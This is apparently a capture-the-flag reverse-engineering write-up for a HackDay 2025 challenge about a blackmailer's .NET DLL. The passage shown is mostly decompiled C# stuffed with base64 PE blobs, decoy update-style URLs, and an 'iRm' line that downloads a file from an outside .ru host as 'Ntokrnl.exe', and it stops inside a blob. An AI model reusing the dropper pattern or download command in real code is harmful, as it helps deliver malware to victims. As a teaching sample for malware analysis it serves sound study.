HackDay 2025 - Qualifications - The Cogs of Blackmail

Posted Jan 27, 2025

By Nolliv22

7 min read

Description

Category: Reverse engineering

In a city where steam and gears govern the world, a major steampunk company named SteamVault Industries dominates the market for mechanical inventions. You are a cybersecurity expert serving the citizens of this futuristic city.

One morning, Victor Gearstone, the chief system administrator of SteamVault, receives an anonymous message from a hacker claiming to possess compromising images of his wife. In exchange for silence, the hacker demands that Victor grant them permanent access to the company’s internal system, jeopardizing critical industrial secrets. Panicked, Victor turns to you to investigate and determine whether the hacker’s claims are genuine or a sophisticated lie.

Your mission is to inspect the received files, analyze the malware sent by the hacker, and uncover the truth. Everything must be done with precision and discretion.

sha256 : ae50d86ac083698999075e8cdf4aac49ff6f1f93622753b04a5cd122155bcd06

Attachment:

DLLception.dll

Overview

DLLception.dll is a .NET Portable Executable. Once decompiled (with dnSpy or dotPeek) we obtain the following code:

Note: Many instances of Thread.Sleep(0); were removed to enhance readability.

        
      
using System;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.Versioning;
using System.Security.Cryptography;
using System.Threading;

public class btJuHzNucnTGdQAZwMmMnhZQZkH
{
	public static void RcyBinrittxjWupPNlCeddcAqv()
	{
		byte[] array = Convert.FromBase64String("TVo/AAMAAAAEAAAAPz8AAD8AAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPwAAAA4fPw4APwk/IT8BTD8hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQoNCiQAAAAAAAAAUEUAAEwBAwB6Pz8/AAAAAAAAAAA/ACIgCwEwAAAIAAAABgAAAAAAABonAAAAIAAAAEAAAAAAABAAIAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAPwAAAAIAAAAAAAADAGA/AAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAAA/JgAATwAAAABAAAAcAwAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAPyUAAFQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAgAAAAAAAAAAAAAAAggAABIAAAAAAAAAAAAAAAudGV4dAAAACAHAAAAIAAAAAgAAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAAAcAwAAAEAAAAAEAAAADQoAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAOAAAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAD8mAAAAAAAASAAAAAIABQBoIAAAeAUAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANgByAQAAcCgNCgAADQomKiICKA4AAA0KACoAQlNKQgEAAQAAAAAADAAAAHY0LjAuMzAzMTkAAAAABQBsAAAAPwEAACN+AAAkAgAAQAIAACNTdHJpbmdzAAAAAGQEAAAgAAAAI1VTAD8EAAAQAAAAI0dVSUQAAAA/BAAAPwAAACNCbG9iAAAAAAAAAAIAAAFHFAAACQAAAAA/ATMAFgAAAQAAABAAAAACAAAAAgAAAA4AAAAMAAAAAQAAAAIAAAAAAD8BAQAAAAAABgA/AD8BBgBQAT8BBgAjAD8BDwA/AQAABgBOAG4BBgA3AT8BBgA/AD8BBgA/AD8BBgA/AD8BBgAeAT8BBgA3AD8BBgA/AG4BBgBnAG4BBgAZAj8BDQoAMgIEAg0KACACBAIAAAAACwAAAAAAAQABAAEAEAA/AQAAOQABAAEAUCAAAAAAPwA/AS0AAQBeIAAAAAA/GD8BBgABAAkAPwEBABEAPwEGABkAPwENCgApAD8BEAAxAD8BEAA5AD8BEABBAD8BEABJAD8BEABRAD8BEABZAD8BEABhAD8BEABpAD8BEAB5AC0CFQBxAD8BBgAuAAsAMQAuABMAOgAuABsAWQAuACMAYgAuACsAPwAuADMAPwAuADsAPwAuAEMAPwAuAEsAPwAuAFMAPwAuAFsAPwAuAGMAPwAEPwAAAQAAAAAAAAAAAAAAAAABAAAABgAAAAAAAAAAAAAAGwAUAAAAAAAGAAAAAgAAAAAAAAAkAAQCAAAAAAAAAAAAaHdfbmV0Ni4wADxNb2R1bGU+AFN5c3RlbS5SdW50aW1lAERlYnVnZ2FibGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAU3VwcG9ydGVkT1NQbGF0Zm9ybUF0dHJpYnV0ZQBUYXJnZXRQbGF0Zm9ybUF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5SW5mb3JtYXRpb25hbFZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAGh3X25ldDYuMC5kbGwAUHJvZ3JhbQBTeXN0ZW0ATWFpbgBTeXN0ZW0uUmVmbGVjdGlvbgAuY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBTeXN0ZW0uV2luZG93cy5Gb3JtcwBPYmplY3QARGlhbG9nUmVzdWx0AFNob3cATWVzc2FnZUJveAAAAAAAG0gAZQBsAGwAbwAsACAAVwBvAHIAbABkACEAAAAAAEMMPws/eD9MPz8tPz8/CWgABCAB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IAAADAAAABw3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0K");
		string value = "HtTpS://WinDOws.UpDaTe.ShUnbCKhiT.NeT/d5nZ72";
		string value2 = "HtTpS://WinDOws.UpDaTe.ShUnbCKhiT.NeT/2hGbZ3";
		byte[] array2 = Convert.FromBase64String("TVo/AAMAAAAEAAAAPz8AAD8AAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPwAAAA4fPw4APwk/IT8BTD8hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQoNCiQAAAAAAAAAUEUAAEwBAwB6Pz8/AAAAAAAAAAA/ACIgCwEwAAAIAAAABgAAAAAAABonAAAAIAAAAEAAAAAAABAAIAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAPwAAAAIAAAAAAAADAGA/AAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAAA/JgAATwAAAABAAAAcAwAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAPyUAAFQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAgAAAAAAAAAAAAAAAggAABIAAAAAAAAAAAAAAAudGV4dAAAACAHAAAAIAAAAAgAAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAAAcAwAAAEAAAAAEAAAADQoAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAOAAAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAD8mAAAAAAAASAAAAAIABQBoIAAAeAUAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANgByAQAAcCgNCgAADQomKiICKA4AAA0KACoAQlNKQgEAAQAAAAAADAAAAHY0LjAuMzAzMTkAAAAABQBsAAAAPwEAACN+AAAkAgAAQAIAACNTdHJpbmdzAAAAAGQEAAAgAAAAI1VTAD8EAAAQAAAAI0dVSUQAAAA/BAAAPwAAACNCbG9iAAAAAAAAAAIAAAFHFAAACQAAAAA/ATMAFgAAAQAAABAAAAACAAAAAgAAAA4AAAAMAAAAAQAAAAIAAAAAAD8BAQAAAAAABgA/AD8BBgBQAT8BBgAjAD8BDwA/AQAABgBOAG4BBgA3AT8BBgA/AD8BBgA/AD8BBgA/AD8BBgAeAT8BBgA3AD8BBgA/AG4BBgBnAG4BBgAZAj8BDQoAMgIEAg0KACACBAIAAAAACwAAAAAAAQABAAEAEAA/AQAAOQABAAEAUCAAAAAAPwA/AS0AAQBeIAAAAAA/GD8BBgABAAkAPwEBABEAPwEGABkAPwENCgApAD8BEAAxAD8BEAA5AD8BEABBAD8BEABJAD8BEABRAD8BEABZAD8BEABhAD8BEABpAD8BEAB5AC0CFQBxAD8BBgAuAAsAMQAuABMAOgAuABsAWQAuACMAYgAuACsAPwAuADMAPwAuADsAPwAuAEMAPwAuAEsAPwAuAFMAPwAuAFsAPwAuAGMAPwAEPwAAAQAAAAAAAAAAAAAAAAABAAAABgAAAAAAAAAAAAAAGwAUAAAAAAAGAAAAAgAAAAAAAAAkAAQCAAAAAAAAAAAAaHdfbmV0Ni4wADxNb2R1bGU+AFN5c3RlbS5SdW50aW1lAERlYnVnZ2FibGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAU3VwcG9ydGVkT1NQbGF0Zm9ybUF0dHJpYnV0ZQBUYXJnZXRQbGF0Zm9ybUF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5SW5mb3JtYXRpb25hbFZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAGh3X25ldDYuMC5kbGwAUHJvZ3JhbQBTeXN0ZW0ATWFpbgBTeXN0ZW0uUmVmbGVjdGlvbgAuY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBTeXN0ZW0uV2luZG93cy5Gb3JtcwBPYmplY3QARGlhbG9nUmVzdWx0AFNob3cATWVzc2FnZUJveAAAAAAAG0gAZQBsAGwAbwAsACAAVwBvAHIAbABkACEAAAAAAEMMPws/eD9MPz8tPz8/CWgABCAB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IAAADAAAABw3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0K");
		string value3 = "HtTpS://WinDOws.UpDaTe.ShUnbCKhiT.NeT/gTbvs4";
		try
		{
			int num = Convert.ToInt32(value3);
			num++;
			if (num % 4 == 1)
			{
				return;
			}
		}
		catch
		{
			}
		Aes aes = Aes.Create();
		string text = "iRm HtTpS://DisTRicT.MsGhVjK.ru/A4QmvO1= -o Ntokrnl.exe";
		string text2 = text;
		foreach (char c in text2)
		{
			if (c == '\0' || c == '\u0001')
			{
				return;
			}
		}
		byte[] iV = new byte[16]
		{
			34, 24, 249, 50, 19, 169, 176, 81, 77, 113,
			42, 8, 30, 58, 25, 86
		};
		try
		{
			int num2 = Convert.ToInt32(value2);
			num2++;
			if (num2 % 3 == 1)
			{
				return;
			}
		}
		catch
		{
			}
		aes.Mode = CipherMode.CBC;
		array2 = Convert.FromBase64String("TVo/AAMAAAAEAAAAPz8AAD8AAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPwAAAA4fPw4APwk/IT8BTD8hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQoNCiQAAAAAAAAAUEUAAEwBAwB6Pz8/AAAAAAAAAAA/ACIgCwEwAAAIAAAABgAAAAAAABonAAAAIAAAAEAAAAAAABAAIAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAPwAAAAIAAAAAAAADAGA/AAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAAA/JgAATwAAAABAAAAcAwAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAPyUAAFQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAgAAAAAAAAAAAAAAAggAABIAAAAAAAAAAAAAAAudGV4dAAAACAHAAAAIAAAAAgAAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAAAcAwAAAEAAAAAEAAAADQoAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAOAAAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAD8mAAAAAAAASAAAAAIABQBoIAAAeAUAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANgByAQAAcCgNCgAADQomKiICKA4AAA0KACoAQlNKQgEAAQAAAAAADAAAAHY0LjAuMzAzMTkAAAAABQBsAAAAPwEAACN+AAAkAgAAQAIAACNTdHJpbmdzAAAAAGQEAAAgAAAAI1VTAD8EAAAQAAAAI0dVSUQAAAA/BAAAPwAAACNCbG9iAAAAAAAAAAIAAAFHFAAACQAAAAA/ATMAFgAAAQAAABAAAAACAAAAAgAAAA4AAAAMAAAAAQAAAAIAAAAAAD8BAQAAAAAABgA/AD8BBgBQAT8BBgAjAD8BDwA/AQAABgBOAG4BBgA3AT8BBgA/AD8BBgA/AD8BBgA/AD8BBgAeAT8BBgA3AD8BBgA/AG4BBgBnAG4BBgAZAj8BDQoAMgIEAg0KACACBAIAAAAACwAAAAAAAQABAAEAEAA/AQAAOQABAAEAUCAAAAAAPwA/AS0AAQBeIAAAAAA/GD8BBgABAAkAPwEBABEAPwEGABkAPwENCgApAD8BEAAxAD8BEAA5AD8BEABBAD8BEABJAD8BEABRAD8BEABZAD8BEABhAD8BEABpAD8BEAB5AC0CFQBxAD8BBgAuAAsAMQAuABMAOgAuABsAWQAuACMAYgAuACsAPwAuADMAPwAuADsAPwAuAEMAPwAuAEsAPwAuAFMAPwAuAFsAPwAuAGMAPwAEPwAAAQAAAAAAAAAAAAAAAAABAAAABgAAAAAAAAAAAAAAGwAUAAAAAAAGAAAAAgAAAAAAAAAkAAQCAAAAAAAAAAAAaHdfbmV0Ni4wADxNb2R1bGU+AFN5c3RlbS5SdW50aW1lAERlYnVnZ2FibGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAU3VwcG9ydGVkT1NQbGF0Zm9ybUF0dHJpYnV0ZQBUYXJnZXRQbGF0Zm9ybUF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5SW5mb3JtYXRpb25hbFZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAGh3X25ldDYuMC5kbGwAUHJvZ3JhbQBTeXN0ZW0ATWFpbgBTeXN0ZW0uUmVmbGVjdGlvbgAuY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBTeXN0ZW0uV2luZG93cy5Gb3JtcwBPYmplY3QARGlhbG9nUmVzdWx0AFNob3cATWVzc2FnZUJveAAAAAAAG0gAZQBsAGwAbwAsACAAVwBvAHIAbABkACEAAAAAAEMMPws/eD9MPz8tPz8/CWgABCABAQgDIAABBSABARERBCABAQ4FAAERQQ4IPz9ffxE/DQo6CD96XFYZND8/AwAAAQgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQAHAQAAAAA9AQAYLk5FVENvcmVBcHAsVmVyc2lvbj12Ni4wAQBUDhRGcmFtZXdvcmtEaXNwbGF5TmFtZQguTkVUIDYuMA4BAAlod19uZXQ2LjAAAA0KAQAFRGVidWcAAAwBAAcxLjAuMC4wAAANCgEABTEuMC4wAAAPAQANCldpbmRvd3M3LjAAAAAAAAAAADM/ID8AAU1QAgAAAGwAAAA0JgAANAgAAAAAAAAAAAAAAQAAABMAAAAnAAAAPyYAAD8IAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAUlNEUz9eQXI/Pz9EPz8/Pz88bjsBAAAAQzpcVXNlcnNcYWRtaW5cc291cmNlXHJlcG9zXFZTQ29kZVxod19uZXQ2LjBcb2JqXERlYnVnXG5ldDYuMC13aW5kb3dzXGh3X25ldDYuMC5wZGIAU0hBMjU2AD9eQXI/Pz9UPz8/Pz88bjszPyApP0dgPxY/VBU/DD8/PyYAAAAAAAAAAAAACScAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD8mAAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAAA/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA